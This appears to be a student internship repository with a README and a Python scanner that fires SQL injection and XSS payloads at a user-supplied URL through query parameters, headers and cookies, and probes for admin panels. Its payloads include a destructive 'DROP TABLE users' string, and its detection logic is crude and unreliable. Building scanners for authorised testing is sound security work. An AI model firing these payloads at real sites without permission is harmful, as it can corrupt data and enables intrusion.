├── README.md ├── WEBAPP-SCANNER.py └── requirements.txt /README.md: -------------------------------------------------------------------------------- 1 | # SQLInjection-scanner 2 | ***COMPANY***: CDETECH IT SOLUTION 3 | 4 | ***NAME***: Sobiya vhora 5 | 6 | ***INTERN ID***: CT08GRD 7 | 8 | ***DOMAIN***: Cyber Security & Ethical Hacking 9 | 10 | ***BATCH DURATION***: December 25th, 2024 to January 25th, 2025 11 | 12 | ***MENTOR NAME***: Neela Santhosh 13 | 14 | ***DESCRIPTION OF TASK-2*** 15 | # SQLInjection-scanner 16 | ## Objective 17 | This Python-based **Web Application Vulnerability Scanner** is designed to identify common security vulnerabilities in web applications. It automates the process of testing for **SQL Injection**, **Cross-Site Scripting (XSS)**, and checks for the presence of common **admin panels**. The tool is useful for cybersecurity professionals and penetration testers to quickly assess the security posture of web applications. 18 | 19 | ## Key Features 20 | - **SQL Injection Detection**: 21 | - Tests query parameters, headers, and cookies for SQL injection vulnerabilities. 22 | - Example payloads: 23 | - `' OR '1'='1` 24 | - `'; DROP TABLE users; --` 25 | - `' UNION SELECT null, version(); --` 26 | 27 | - **Cross-Site Scripting (XSS) Detection**: 28 | - Scans query parameters, headers, cookies, and dynamic content for XSS vulnerabilities. 29 | - Example payloads: 30 | - `` 31 | - `

` 32 | 33 | - **Admin Panel Detection**: 34 | - Searches for common admin panel endpoints such as: 35 | - `/admin` 36 | - `/administrator` 37 | - `/admin/login` 38 | - `/admin/dashboard` 39 | 40 | - **File Metadata Injection**: 41 | - Tests for XSS vulnerabilities through uploaded file metadata. 42 | 43 | - **Dynamic Content Injection**: 44 | - Checks if the application is vulnerable to dynamic content injection through query strings. 45 | 46 | ## Example Usage 47 | ```bash 48 | $ python WEBAPP-SCANNER.py 49 | Enter the target URL: https://example.com 50 | 51 | [START] Scanning URL: https://example.com 52 | [INFO] Testing query parameters for SQL Injection... 53 | [VULNERABLE] SQL Injection in parameter 'id' with payload: ' OR '1'='1 54 | [INFO] Testing headers for XSS... 55 | [VULNERABLE] XSS in header 'Referer' with payload: 56 | [INFO] Testing admin panel endpoints... 57 | [INFO] Admin panel not found at https://example.com/admin. 58 | [SUMMARY] Scan completed. 59 | [END] Thank you for using the scanner! 60 | ``` 61 | 62 | ## Requirements 63 | - Python 3.x 64 | - Required libraries: 65 | - `requests` 66 | - `bs4` (BeautifulSoup) 67 | - `colorama` 68 | 69 | Install the required libraries using: 70 | ```bash 71 | pip install -r requirements.txt 72 | ``` 73 | 74 | ## How to Run 75 | 1. Clone the repository: 76 | ```bash 77 | git clone https://github.com/SobiyMariyam/webapp-vulnerability-scanner.git 78 | cd webapp-vulnerability-scanner 79 | ``` 80 | 2. Run the script: 81 | ```bash 82 | python WEBAPP-SCANNER.py 83 | ``` 84 | 85 | ## How It Works 86 | 1. The user provides a target URL as input. 87 | 2. The scanner sequentially tests: 88 | - Query parameters 89 | - HTTP headers 90 | - Cookies 91 | - Common admin panel endpoints 92 | - File upload metadata 93 | 3. After testing, the tool summarizes the vulnerabilities found. 94 | 95 | ## Disclaimer 96 | This tool is intended for educational purposes and authorized penetration testing only. Ensure you have proper permission before scanning any web application. 97 | 98 | ## Output Example 99 | ![Screenshot 2025-01-11 115926](https://github.com/user-attachments/assets/b74d6ee8-1171-49fd-af67-c4f11fa631aa) 100 | 101 | 102 | -------------------------------------------------------------------------------- /WEBAPP-SCANNER.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | from urllib.parse import urljoin, urlencode, urlparse, parse_qs 4 | import colorama 5 | from colorama import Fore, Style 6 | 7 | colorama.init() 8 | 9 | # Payloads for SQL Injection and XSS 10 | SQLI_PAYLOADS = ["' OR '1'='1", "'; DROP TABLE users; --", "' UNION SELECT null, version(); --"] 11 | XSS_PAYLOADS = ["", "

"] 12 | 13 | # Custom headers for testing 14 | TEST_HEADERS = { 15 | "User-Agent": "' OR '1'='1", 16 | "Referer": "", 17 | "X-Custom-Header": "' UNION SELECT null, version(); --" 18 | } 19 | 20 | # Test cookies for vulnerabilities 21 | TEST_COOKIES = { 22 | "session_id": "' OR '1'='1", 23 | "tracking_id": "" 24 | } 25 | 26 | def find_forms(url): 27 | """Fetch and return all forms from a given URL.""" 28 | try: 29 | response = requests.get(url) 30 | soup = BeautifulSoup(response.content, 'html.parser') 31 | return soup.find_all('form') 32 | except Exception as e: 33 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Could not fetch forms from {url}: {e}") 34 | return [] 35 | 36 | def test_query_parameters(url, payloads, vuln_type): 37 | """Test query parameters in the URL for vulnerabilities.""" 38 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing query parameters for {vuln_type}...") 39 | parsed_url = urlparse(url) 40 | query_params = parse_qs(parsed_url.query) 41 | if not query_params: 42 | print(f"{Fore.YELLOW}[INFO]{Style.RESET_ALL} No query parameters to test.") 43 | return False 44 | vulnerable = False 45 | for param, values in query_params.items(): 46 | for payload in payloads: 47 | test_params = query_params.copy() 48 | test_params[param] = payload 49 | test_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(test_params, doseq=True)}" 50 | try: 51 | response = requests.get(test_url) 52 | if vuln_type == "SQL Injection" and ("SQL" in response.text or "error" in response.text): 53 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in parameter '{param}' with payload: {payload}") 54 | vulnerable = True 55 | elif vuln_type == "XSS" and payload in response.text: 56 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in parameter '{param}' with payload: {payload}") 57 | vulnerable = True 58 | except Exception as e: 59 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing parameter '{param}': {e}") 60 | return vulnerable 61 | 62 | def test_headers(url, vuln_type): 63 | """Test HTTP headers for vulnerabilities.""" 64 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing headers for {vuln_type}...") 65 | vulnerable = False 66 | for header, payload in TEST_HEADERS.items(): 67 | headers = {header: payload} 68 | try: 69 | response = requests.get(url, headers=headers) 70 | if vuln_type == "SQL Injection" and ("SQL" in response.text or "error" in response.text): 71 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in header '{header}' with payload: {payload}") 72 | vulnerable = True 73 | elif vuln_type == "XSS" and payload in response.text: 74 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in header '{header}' with payload: {payload}") 75 | vulnerable = True 76 | except Exception as e: 77 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing header '{header}': {e}") 78 | return vulnerable 79 | 80 | def test_cookies(url, vuln_type): 81 | """Test cookies for vulnerabilities.""" 82 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing cookies for {vuln_type}...") 83 | vulnerable = False 84 | for cookie, payload in TEST_COOKIES.items(): 85 | cookies = {cookie: payload} 86 | try: 87 | response = requests.get(url, cookies=cookies) 88 | if vuln_type == "SQL Injection" and ("SQL" in response.text or "error" in response.text): 89 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in cookie '{cookie}' with payload: {payload}") 90 | vulnerable = True 91 | elif vuln_type == "XSS" and payload in response.text: 92 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in cookie '{cookie}' with payload: {payload}") 93 | vulnerable = True 94 | except Exception as e: 95 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing cookie '{cookie}': {e}") 96 | return vulnerable 97 | 98 | def test_dynamic_content(url, payloads): 99 | """Test for dynamic content injection vulnerabilities.""" 100 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing dynamic content injection...") 101 | vulnerable = False 102 | for payload in payloads: 103 | test_url = f"{url}?content={payload}" 104 | try: 105 | response = requests.get(test_url) 106 | if payload in response.text: 107 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} Dynamic content injection with payload: {payload}") 108 | vulnerable = True 109 | except Exception as e: 110 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing dynamic content injection: {e}") 111 | return vulnerable 112 | 113 | 114 | def test_admin_panels(url): 115 | """Test common admin panel endpoints.""" 116 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing admin panel endpoints...") 117 | admin_paths = ["/admin", "/administrator", "/admin/login", "/admin/dashboard"] 118 | for path in admin_paths: 119 | test_url = urljoin(url, path) 120 | try: 121 | response = requests.get(test_url) 122 | if response.status_code == 200: 123 | print(f"{Fore.GREEN}[INFO]{Style.RESET_ALL} Admin panel found at {test_url}.") 124 | else: 125 | print(f"{Fore.YELLOW}[INFO]{Style.RESET_ALL} Admin panel not found at {test_url}.") 126 | except Exception as e: 127 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing admin panel: {e}") 128 | 129 | def test_file_metadata(url, file_payload): 130 | """Test metadata in uploaded files for vulnerabilities.""" 131 | print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing file metadata...") 132 | files = {'file': ('.txt', file_payload)} 133 | try: 134 | response = requests.post(url, files=files) 135 | if "XSS" in response.text: 136 | print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} File metadata vulnerability detected.") 137 | except Exception as e: 138 | print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing file metadata: {e}") 139 | 140 | def main(url): 141 | """Main function to run the scanner for all vulnerabilities.""" 142 | print(f"{Fore.BLUE}[START]{Style.RESET_ALL} Scanning URL: {url}") 143 | 144 | # Query Parameters 145 | test_query_parameters(url, SQLI_PAYLOADS, "SQL Injection") 146 | test_query_parameters(url, XSS_PAYLOADS, "XSS") 147 | 148 | # Headers 149 | test_headers(url, "SQL Injection") 150 | test_headers(url, "XSS") 151 | 152 | # Cookies 153 | test_cookies(url, "SQL Injection") 154 | test_cookies(url, "XSS") 155 | 156 | # Dynamic Content Injection 157 | test_dynamic_content(url, XSS_PAYLOADS) 158 | 159 | 160 | 161 | # Admin Panel Inputs 162 | test_admin_panels(url) 163 | 164 | # File Metadata 165 | test_file_metadata(url, "Sample payload for file upload vulnerability testing.") 166 | 167 | print(f"{Fore.MAGENTA}[SUMMARY]{Style.RESET_ALL} Scan completed.") 168 | print(f"{Fore.BLUE}[END]{Style.RESET_ALL} Thank you for using the scanner!") 169 | 170 | if __name__ == "__main__": 171 | target_url = input("Enter the target URL: ") 172 | main(target_url) 173 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | beautifulsoup4 3 | colorama 4 | --------------------------------------------------------------------------------